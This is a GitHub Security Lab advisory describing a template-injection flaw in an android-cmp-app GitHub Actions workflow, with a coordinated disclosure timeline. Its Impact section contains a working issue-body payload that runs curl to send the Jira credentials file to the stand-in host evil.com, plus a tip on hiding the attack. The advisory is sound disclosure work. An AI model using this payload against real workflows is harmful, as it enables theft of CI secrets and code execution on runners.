December 3, 2020

GHSL-2020-208: Template injection in a GitHub workflow of SourcePointUSA/android-cmp-app repository

Jaroslav Lobačevski

Summary

Automatic GitHub workflow in SourcePointUSA/android-cmp-app repository is vulnerable to template injection from user comments.

Product

SourcePointUSA/android-cmp-app repository

Tested Version

Develop branch.

Details

Issue: Hidden expression expansion of input parameters passed to andresilveirah/gajira-create

Create Issue step in CreateJiraTicket.yml workflow is vulnerable to template injection.

${{ github.event.issue.title }} and ${{ github.event.issue.body }} are used to format input values to andresilveirah/gajira-create action:

- name: Create Issue
  id: create
  uses: andresilveirah/gajira-create@master
  with:
    project: SP
    issuetype: Bug
    summary: "[Android][TCFv2] ${{github.event.issue.title}}"
    description: "${{github.event.issue.body}}\n This issue was reported by ${{github.event.issue.user.login}} via GitHub.\n ${{github.event.issue.html_url}}"
    labels: "In-App,GitHub"

The andresilveirah/gajira-create is in fact an outdated fork of the Atlassian/gajira-create action. The action has a hidden feature - it expands {{}} internally. This way when the comment body contains an expression in double curly braces it is evaluated by node.js in these actions.

Impact

This vulnerability allows for arbitrary code execution in the context of GitHub runner. For example a user may create an issue with the body:

{{ process.mainModule.require('child_process').exec(`curl -d @${process.env.HOME}/.jira.d/credentials http://evil.com`) }}

which will exfiltrate the secret Jira API token to the attacker controlled server. To make the attack less visible an attacker may modify the issue to Never mind my bad and close it.

Coordinated Disclosure Timeline

  • 10/29/2020: Report sent to vendor
  • 11/06/2020: Issue resolved

Credit

This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2020-208 in any communication regarding this issue.